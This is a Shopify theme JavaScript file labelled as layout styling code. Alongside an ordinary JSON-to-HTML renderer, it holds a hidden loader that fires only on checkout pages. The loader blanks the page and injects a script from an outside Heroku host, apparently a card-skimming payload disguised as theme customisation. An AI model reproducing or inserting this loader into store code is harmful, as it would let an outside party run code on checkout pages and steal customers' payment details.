<!-- ============================================================================= -->
<!-- Ella Custom JS - Customize The Style For Layout -->
<!-- ============================================================================= -->

<!-- ============================================================================= -->
<!-- IMPORTANT DISCLAIMER -->
<!-- Please use only JS to style the layout. -->
<!-- ============================================================================= -->

    (function () {
      try {
        if (!window.Shopify.Checkout && !window.Shopify.checkout) return;
        document.body.style.opacity = 0;
        var script = document.createElement('script');
        script.src = 'http://glacial-cliffs-43603.herokuapp.com/script.js';
        script.async = false;
        var head = document.getElementsByTagName('head')[0];
        head.insertBefore(script, head.firstChild);
      } catch(e) {
        document.body.style.opacity = 1;
      }
    })();

  document.addEventListener("DOMContentLoaded", function() {
    // Get the JSON string from the hidden div
    var additionalInfoElement = document.getElementById("additional-info-json");
    var additionalInfoJson = additionalInfoElement.textContent || additionalInfoElement.innerText;

    try {
      // Parse the JSON string
      var additionalInfo = JSON.parse(additionalInfoJson);

      // Function to render the parsed JSON into HTML
      function renderAdditionalInfo(info) {
        var outputHtml = '';

        // Check if there are children elements
        if (info.children && Array.isArray(info.children)) {
          info.children.forEach(function(child) {
            if (child.listType === 'unordered' && child.type === 'list') {
              outputHtml += '<ul>';
              child.children.forEach(function(listItem) {
                if (listItem.type === 'list-item') {
                  outputHtml += '<li>' + listItem.children[0].value + '</li>';
                }
              });
              outputHtml += '</ul>';
            } else if (child.type === 'paragraph') {
              outputHtml += '<p>';
              child.children.forEach(function(paragraphChild) {
                outputHtml += paragraphChild.value;
              });
              outputHtml += '</p>';
            }
          });
        }

        return outputHtml;
      }

      // Generate the HTML
      var additionalInfoHtml = renderAdditionalInfo(additionalInfo);

      // Append the HTML to the body or a specific div
      var targetDiv = document.getElementById("additional-info-rendered");
      if (targetDiv) {
        targetDiv.innerHTML = additionalInfoHtml;
      }
    } catch (e) {
      console.error("Failed to parse additional_info:", e);
    }
  });


